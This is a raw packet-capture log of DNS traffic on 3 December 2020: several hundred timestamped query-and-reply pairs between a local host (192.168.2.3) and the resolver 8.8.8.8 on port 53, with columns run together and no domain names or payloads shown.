                                    Dec 3, 2020 10:03:08.061608076 CET5299253192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:08.097146988 CET53529928.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:08.183008909 CET5512953192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:08.226962090 CET53551298.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:08.342209101 CET6095953192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:08.369294882 CET53609598.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:08.378318071 CET5831953192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:08.414122105 CET53583198.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:08.640106916 CET6478553192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:08.667260885 CET53647858.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:08.760520935 CET5020853192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:08.787640095 CET53502088.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:08.922322035 CET6247753192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:08.949558973 CET53624778.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:09.173088074 CET5446753192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:09.200198889 CET53544678.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:09.202274084 CET6054853192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:09.237628937 CET53605488.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:09.503087044 CET5962353192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:09.530018091 CET53596238.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:09.625865936 CET5168953192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:09.661299944 CET53516898.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:09.788084984 CET6480653192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:09.815169096 CET53648068.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:10.242281914 CET4968653192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:10.270598888 CET53496868.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:10.413285017 CET5619553192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:10.448693991 CET53561958.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:10.629410982 CET6224153192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:10.656408072 CET53622418.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:11.015091896 CET5054353192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:11.050388098 CET53505438.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:11.502537012 CET5644553192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:11.529567957 CET53564458.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:11.542805910 CET5670953192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:11.578269005 CET53567098.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:11.768229008 CET5124853192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:11.795329094 CET53512488.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:11.971050024 CET4967953192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:12.008619070 CET53496798.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:12.141284943 CET5026353192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:12.168389082 CET53502638.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:12.443948030 CET4921553192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:12.471132994 CET53492158.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:12.813215971 CET6437253192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:12.840190887 CET53643728.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:13.089744091 CET5001653192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:13.116857052 CET53500168.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:13.933495998 CET6132553192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:13.969163895 CET53613258.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:15.775830030 CET4916053192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:15.802970886 CET53491608.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:16.220994949 CET5126553192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:16.248004913 CET53512658.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:16.659768105 CET5200653192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:16.686774969 CET53520068.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:17.074780941 CET5869753192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:17.101861954 CET53586978.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:17.538553953 CET5153053192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:17.576236963 CET53515308.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:18.230065107 CET5098953192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:18.257051945 CET53509898.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:18.976856947 CET5332353192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:19.004000902 CET53533238.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:19.320147991 CET5903453192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:19.347383022 CET53590348.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:19.666008949 CET5310653192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:19.693027973 CET53531068.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:19.815073967 CET6213253192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:19.852605104 CET53621328.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:20.114562035 CET5448953192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:20.141608000 CET53544898.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:20.585319996 CET6439053192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:20.612430096 CET53643908.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:20.865005970 CET5836953192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:20.892046928 CET53583698.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:21.350702047 CET6420353192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:21.386265039 CET53642038.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:21.938216925 CET4923253192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:21.965183020 CET53492328.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:22.212102890 CET5255853192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:22.239182949 CET53525588.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:22.710444927 CET5355553192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:22.737561941 CET53535558.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:22.973746061 CET5008353192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:23.001060009 CET53500838.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:23.470324039 CET4980453192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:23.506064892 CET53498048.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:23.971995115 CET6296353192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:23.999000072 CET53629638.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:24.279090881 CET6369553192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:24.315536022 CET53636958.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:24.629245996 CET6429653192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:24.656239986 CET53642968.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:25.133505106 CET6084453192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:25.160573959 CET53608448.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:25.611252069 CET6391753192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:25.638206959 CET53639178.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:26.139666080 CET5185153192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:26.166709900 CET53518518.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:26.750502110 CET4989853192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:26.777601957 CET53498988.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:27.020617962 CET4963253192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:27.047732115 CET53496328.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:27.542334080 CET6536153192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:27.569431067 CET53653618.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:28.052023888 CET5020653192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:28.079176903 CET53502068.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:28.320911884 CET4961353192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:28.347884893 CET53496138.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:28.947045088 CET6303253192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:28.974086046 CET53630328.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:29.212243080 CET5489853192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:29.239267111 CET53548988.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:29.856785059 CET6171053192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:29.883810997 CET53617108.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:30.428265095 CET5207353192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:30.455344915 CET53520738.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:30.940175056 CET6394953192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:30.967179060 CET53639498.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:31.211011887 CET5756153192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:31.238079071 CET53575618.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:31.701210022 CET5320553192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:31.728187084 CET53532058.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:31.965411901 CET6057953192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:31.992304087 CET53605798.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:32.553005934 CET4976553192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:32.580051899 CET53497658.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:32.813930035 CET5765053192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:32.841048956 CET53576508.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:33.387254000 CET6531753192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:33.414453983 CET53653178.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:33.887957096 CET6465453192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:33.915010929 CET53646548.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:34.397080898 CET5119153192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:34.424179077 CET53511918.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:34.893606901 CET6387053192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:34.920726061 CET53638708.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:35.446471930 CET5701353192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:35.481955051 CET53570138.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:35.982255936 CET5874553192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:36.018115044 CET53587458.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:36.558135033 CET6427253192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:36.585150003 CET53642728.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:37.046510935 CET5644053192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:37.073591948 CET53564408.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:37.585237980 CET5949253192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:37.612159967 CET53594928.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:38.089342117 CET6212553192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:38.116751909 CET53621258.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:38.558370113 CET6177653192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:38.593563080 CET53617768.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:39.105139017 CET5392853192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:39.132040977 CET53539288.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:39.622893095 CET5105853192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:39.660496950 CET53510588.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:39.961132050 CET5671153192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:39.990310907 CET53567118.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:40.350091934 CET5478053192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:40.385514975 CET53547808.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:40.643349886 CET5430553192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:40.670334101 CET53543058.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:40.917800903 CET6166953192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:40.944808006 CET53616698.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:41.210357904 CET5733653192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:41.237742901 CET53573368.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:41.501154900 CET6457753192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:41.528228045 CET53645778.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:41.788903952 CET6498753192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:41.815978050 CET53649878.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:42.078183889 CET5865553192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:42.105398893 CET53586558.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:42.745702982 CET6090553192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:42.772661924 CET53609058.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:43.046442032 CET6277653192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:43.073678017 CET53627768.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:43.359462976 CET5692353192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:43.386657953 CET53569238.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:43.637032032 CET6520153192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:43.663877010 CET53652018.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:43.957545042 CET5426453192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:43.984477043 CET53542648.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:44.347207069 CET5843953192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:44.374341965 CET53584398.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:44.619749069 CET5423553192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:44.646862984 CET53542358.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:44.920094967 CET5587653192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:44.947272062 CET53558768.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:45.199316978 CET5699453192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:45.226454020 CET53569948.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:45.705465078 CET5883253192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:45.740957022 CET53588328.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:46.270900965 CET5180053192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:46.297924995 CET53518008.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:46.745162964 CET5883653192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:46.772357941 CET53588368.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:47.266988039 CET6466953192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:47.294194937 CET53646698.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:47.829632998 CET6473553192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:47.856794119 CET53647358.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:48.394521952 CET5247253192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:48.421653986 CET53524728.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:48.946424961 CET5169753192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:48.973506927 CET53516978.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:49.333678007 CET5675253192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:49.368880033 CET53567528.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:49.653568029 CET5544753192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:49.680624962 CET53554478.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:50.292429924 CET5372253192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:50.319664955 CET53537228.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:50.652407885 CET6393453192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:50.679482937 CET53639348.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:50.984679937 CET6424153192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:51.011617899 CET53642418.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:51.184968948 CET6017453192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:51.212004900 CET53601748.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:51.697694063 CET5367853192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:51.724632978 CET53536788.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:51.771825075 CET5505953192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:51.809716940 CET53550598.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:51.962105036 CET6365453192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:51.989200115 CET53636548.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:52.491959095 CET5402553192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:52.518933058 CET53540258.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:53.082986116 CET5422753192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:53.110177994 CET53542278.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:53.163695097 CET5562053192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:53.190767050 CET53556208.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:53.692517996 CET6234253192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:53.719638109 CET53623428.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:53.964230061 CET6160453192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:53.991311073 CET53616048.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:54.522007942 CET5634053192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:54.549211979 CET53563408.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:55.105586052 CET5401153192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:55.132646084 CET53540118.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:55.323895931 CET4960853192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:55.359492064 CET53496088.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:55.802597046 CET5252953192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:55.829653025 CET53525298.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:56.065541029 CET5890153192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:56.092653990 CET53589018.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:56.584539890 CET5629753192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:56.611583948 CET53562978.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:57.100286007 CET5958053192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:57.127315044 CET53595808.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:57.629905939 CET5429953192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:57.665216923 CET53542998.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:58.233308077 CET5854953192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:58.260405064 CET53585498.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:58.499917984 CET5238553192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:58.526932001 CET53523858.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:58.767443895 CET5090753192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:58.794562101 CET53509078.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:59.049704075 CET5910353192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:59.076771021 CET53591038.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:59.326589108 CET5638653192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:59.353662014 CET53563868.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:59.609312057 CET6205353192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:59.636375904 CET53620538.8.8.8192.168.2.3
                                    Dec 3, 2020 10:03:59.880233049 CET5460853192.168.2.38.8.8.8
                                    Dec 3, 2020 10:03:59.915659904 CET53546088.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:00.164766073 CET5262953192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:00.191922903 CET53526298.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:00.456994057 CET5197453192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:00.484050989 CET53519748.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:00.739052057 CET5063853192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:00.766160965 CET53506388.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:01.117043972 CET5615353192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:01.144134998 CET53561538.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:01.421802998 CET6200053192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:01.448929071 CET53620008.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:01.710134983 CET5395053192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:01.737176895 CET53539508.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:02.015068054 CET6376953192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:02.042148113 CET53637698.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:02.381865025 CET5549353192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:02.409003019 CET53554938.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:02.661564112 CET5252553192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:02.688880920 CET53525258.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:02.942312956 CET6359053192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:02.969583988 CET53635908.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:03.232505083 CET5461853192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:03.259670019 CET53546188.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:03.505784988 CET6285653192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:03.532891989 CET53628568.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:03.795294046 CET4921453192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:03.822348118 CET53492148.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:04.074474096 CET5749353192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:04.101543903 CET53574938.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:04.355796099 CET5924753192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:04.391450882 CET53592478.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:04.647460938 CET5080953192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:04.674464941 CET53508098.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:04.915332079 CET5543353192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:04.942394018 CET53554338.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:05.199299097 CET5996253192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:05.226393938 CET53599628.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:05.483560085 CET5520153192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:05.510657072 CET53552018.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:05.769323111 CET6174253192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:05.796542883 CET53617428.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:06.074758053 CET5332353192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:06.101805925 CET53533238.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:06.352900982 CET5926253192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:06.380043030 CET53592628.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:06.635427952 CET5615953192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:06.662600994 CET53561598.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:06.949789047 CET5218853192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:06.977004051 CET53521888.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:07.224431038 CET5839753192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:07.251466990 CET53583978.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:07.525737047 CET5476253192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:07.552763939 CET53547628.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:07.808995962 CET5557753192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:07.835998058 CET53555778.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:08.217499971 CET5603353192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:08.244343996 CET53560338.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:08.498416901 CET5925153192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:08.525451899 CET53592518.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:08.637617111 CET5146753192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:08.664602995 CET53514678.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:08.778889894 CET6270853192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:08.805875063 CET53627088.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:09.057873011 CET5379853192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:09.084884882 CET53537988.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:09.325339079 CET5384253192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:09.352477074 CET53538428.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:09.508215904 CET5707153192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:09.544054985 CET53570718.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:09.614290953 CET5993053192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:09.641357899 CET53599308.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:09.901053905 CET5699853192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:09.928231001 CET53569988.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:10.190378904 CET5622853192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:10.217499018 CET53562288.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:10.459393978 CET6249153192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:10.486563921 CET53624918.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:10.736605883 CET6130053192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:10.763757944 CET53613008.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:11.023058891 CET5510053192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:11.050237894 CET53551008.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:11.390893936 CET5187253192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:11.417982101 CET53518728.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:11.669486046 CET6047653192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:11.696677923 CET53604768.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:11.944083929 CET5506953192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:11.971090078 CET53550698.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:12.247473955 CET5917253192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:12.274544001 CET53591728.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:12.585220098 CET5707953192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:12.612289906 CET53570798.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:12.864528894 CET6011153192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:12.891649008 CET53601118.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:13.144134045 CET5646353192.168.2.38.8.8.8
                                    Dec 3, 2020 10:04:13.171314955 CET53564638.8.8.8192.168.2.3
                                    Dec 3, 2020 10:04:13.455523968 CET5988053192.168.2.38.8.8.8
